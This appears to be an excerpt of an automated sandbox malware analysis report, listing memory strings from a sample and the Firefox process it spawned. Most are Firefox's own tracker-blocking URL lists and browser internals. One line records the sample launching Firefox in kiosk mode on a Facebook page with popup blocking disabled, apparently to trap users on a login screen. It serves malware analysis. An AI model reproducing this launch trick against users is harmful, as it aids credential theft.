"*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"] equals www.rambler.ru (Rambler)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: _addSuggestedIndexResults_updateFlexData/flexDataArray<incrementModificationCountsetSpellcheckUserOverrideremoveDocumentStateListenereEditorEnableWrapHackMask_addSuggestedIndexResults/<fractionalDataArray is empty!isSafeToPlayDeferredEventDOM_VK_WIN_OEM_FJ_TOUROKUDOM_VK_OPEN_CURLY_BRACKETcanIncrementMinKeywordLengthurlbarView-title-separatorexperimental.hideHeuristicmaxHistoricalSearchSuggestionsWEATHER_PROVIDER_DISPLAY_NAMEstrippedUrlToTopPrefixAndTitle#recordEngagementTelemetrysuggestedIndexResultsByGroupcontextual.services.quicksuggestisURLEquivalentToResultURLfirefox-suggest-urlbar-block_checkAndSetExposurePropertiesMust provide a boolean argumentincrementMinKeywordLengthDOM_KEY_LOCATION_STANDARDfirefox-suggest-weather-titleDOM_VK_WIN_OEM_FJ_MASSHOUfirefox-suggest-weather-high-lowDismissing weather resultDOM_VK_CLOSE_CURLY_BRACKETremoveAttributeOrEquivalenteNewlinesReplaceWithSpaces.panel-header > h1 > span_createNoSyncedTabsElementtoolkit/branding/accounts.ftlappMenu-header-descriptionPanelUI-fxa-remotetabs-tabslistrecordSyncedTabsTelemetrysendTabConfiguredAndLoadingensureUnloadHandlerRegisteredget _arrowNavigableWalkerMIN_STATUS_ANIMATION_DURATIONidentity.fxaccounts.enabled_createShowMoreSyncedTabsElementappmenu-fxa-sync-and-save-data2ensureUnloadHandlerRegistered/<_transitionViews/viewRect<https://www.facebook.com/videogWindowsWithUnloadHandleropenPopup/openPopupPromise<EnsureFxAccountsWebChannel equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2959104555.000001E7545E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: am Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCMOZ_CRASHREPORTER_DATA_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_CRASHREPORTER_EVENTS_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\user\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla Firefox\firefox.exeMOZ_CRASHREPORTER_RESTART_ARG_1=--kioskMOZ_CRASHREPORTER_RESTART_ARG_2=https://www.facebook.com/videoMOZ_CRASHREPORTER_RESTART_ARG_3=--no-default-browser-checkMOZ_CRASHREPORTER_RESTART_ARG_4=--disable-popup-blockingMOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Program Files\Mozilla Firefox\browser\crashreporter-override.iniNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files\Mozilla Firefox;C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:? equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: browser.fixup.domainsuffixwhitelist.Failed to listen. Listener already attached.@mozilla.org/network/protocol;1?name=default{9e9a9283-0ce9-4e4a-8f1c-ba129a032c32}^[a-z0-9-]+(\.[a-z0-9-]+)*:[0-9]{1,5}([/?#]|$)devtools/client/framework/devtoolsreleaseDistinctSystemPrincipalLoaderresource://devtools/shared/security/socket.jsUnable to start devtools server on WebChannel/this._originCheckCallbackbrowser.fixup.dns_first_for_single_words@mozilla.org/network/protocol;1?name=filebrowser.urlbar.dnsResolveFullyQualifiedNamesget FIXUP_FLAG_FORCE_ALTERNATE_URIdevtools/client/framework/devtools-browserresource://devtools/server/devtools-server.js^([a-z][a-z0-9.+\t-]*)(:|;)?(\/\/)?DevTools telemetry entry point failed: devtools.debugger.remote-websocketdevtools.performance.recording.ui-base-urlFailed to listen. Callback argument missing.No callback set for this channel.^([a-z+.-]+:\/{0,3})*([^\/@]+@).+devtools.performance.popup.feature-flag@mozilla.org/dom/slow-script-debug;1@mozilla.org/uriloader/handler-service;1get FIXUP_FLAG_ALLOW_KEYWORD_LOOKUPget FIXUP_FLAGS_MAKE_ALTERNATE_URIJSON Viewer's onSave failed in startPersistenceresource://gre/modules/DeferredTask.sys.mjsresource://gre/modules/ExtHandlerService.sys.mjsresource://gre/modules/URIFixup.sys.mjshttps://poczta.interia.pl/mh/?mailto=%s@mozilla.org/uriloader/dbus-handler-app;1@mozilla.org/network/file-input-stream;1_injectDefaultProtocolHandlersIfNeededisDownloadsImprovementsAlreadyMigrated@mozilla.org/network/async-stream-copier;1https://mail.inbox.lv/compose?to=%sCan't invoke URIFixup in the content process{c6cf88b7-452e-47eb-bdc9-86e3561648ef}https://mail.yahoo.co.jp/compose/?To=%sScheme should be either http or httpsresource://gre/modules/JSONFile.sys.mjsgecko.handlerService.defaultHandlersVersionhttp://poczta.interia.pl/mh/?mailto=%shandlerSvc fillHandlerInfo: don't know this 
type@mozilla.org/uriloader/local-handler-app;1@mozilla.org/uriloader/web-handler-app;1resource://gre/modules/FileUtils.sys.mjsresource://gre/modules/NetUtil.sys.mjs_finalizeInternal/this._finalizePromise<https://e.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/DeferredTask.sys.mjshttp://compose.mail.yahoo.co.jp/ym/Compose?To=%sextractScheme/fixupChangedProtocol<{33d75835-722f-42c0-89cc-44f328e56a86}http://www.inbox.lv/rfc2368/?value=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sresource://gre/modules/FileUtils.sys.mjsresource://gre/modules/JSONFile.sys.mjsMust have a source and a callback@mozilla.org/network/input-stream-pump;1newChannel requires a single object argumentSEC_ALLOW_CROSS_ORIGIN_SEC_CONTEXT_IS_NULLNon-zero amount of bytes must be specified@mozilla.org/intl/converter-input-stream;1https://mail.yahoo.co.jp/compose/?To=%shttps://mail.yandex.ru/compose?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%sFirst argument should be an nsIInputStreamhttps://poczta.interia.pl/mh/?mailto=%spdfjs.previousHandler.preferredActionpdfjs.previousHandler.alwaysAskBeforeHandling@mozilla.org/uriloader/handler-service;1VALID
Source: firefox.exe, 0000001D.00000002.2963529504.000001E75E532000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: doff-text" data-l10n-args="{&quot;engine&quot;: &quot;Google&quot;}"></div><input type="search" class="fake-editable" tabindex="-1" aria-hidden="true"/><div class="fake-caret"></div></button></div></div></div><div class="body-wrapper on"><div class="discovery-stream ds-layout"><div class="ds-column ds-column-12"><div class="ds-column-grid"><div><div class="ds-top-sites"><section class="collapsible-section top-sites" data-section-id="topsites"><div class="section-top-bar"><h3 class="section-title-container " style="visibility:hidden"><span class="section-title"><span data-l10n-id="newtab-section-header-topsites"></span></span><span class="learn-more-link-wrapper"></span></h3></div><div><ul class="top-sites-list"><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer placeholder "><div class="top-site-inner"><a class="top-site-button" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper"><div class=""></div></div></div><div class="title"><span dir="auto"><br/><span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><button aria-haspopup="dialog" class="context-menu-button edit-button icon" data-l10n-id="newtab-menu-topsites-placeholder-tooltip"></button><div 
class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.youtube.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="Y"><div class="top-site-icon rich-icon" style="background-image:url(chrome://activity-stream/content/data/content/tippytop/images/youtube-com@2x.png)"></div></div></div><div class="title"><span dir="auto">YouTube<span class="sponsored-label" data-l10n-id="newtab-topsite-sponsored"></span></span></div></a><div><button aria-haspopup="true" data-l10n-id="newtab-menu-content-tooltip" data-l10n-args="{&quot;title&quot;:&quot;YouTube&quot;}" class="context-menu-button icon"></button></div><div class="topsite-impression-observer"></div></div></li><li class="top-site-outer"><div class="top-site-inner"><a class="top-site-button" href="https://www.facebook.com/" tabindex="0" draggable="true" data-is-sponsored-link="false"><div class="tile" aria-hidden="true"><div class="icon-wrapper" data-fallback="F"><div class="top-site-icon rich-icon" style="backgroun
Source: firefox.exe, 0000001D.00000002.3002770667.000001E764EB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com equals www.facebook.com (Facebook)
Source: 5e28f62265.exe, 0000000E.00000002.2872503663.0000000000DF8000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2997276165.000001E763B1B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/video equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2969240727.000001E75EF75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/videoCS_removeLogEventListenerbrowsing-context-discardedPREF_BRANCH_WAS_REGISTEREDIDB_MIGRATE_RESULT_HISTOGRAM equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.2955106076.000001E752C03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/video`^U equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001D.00000002.3011244155.000021593DC00000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.comZ equals www.facebook.com (Facebook)
Source: 5e28f62265.exe, 0000000E.00000003.2836170550.0000000000854000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: illa Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://www.facebook.com/video" --no-default-browser-check --disable-popup-blockingC:\Program Files\Mozilla Firefox\firefox.exewinsta0\defaultALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common 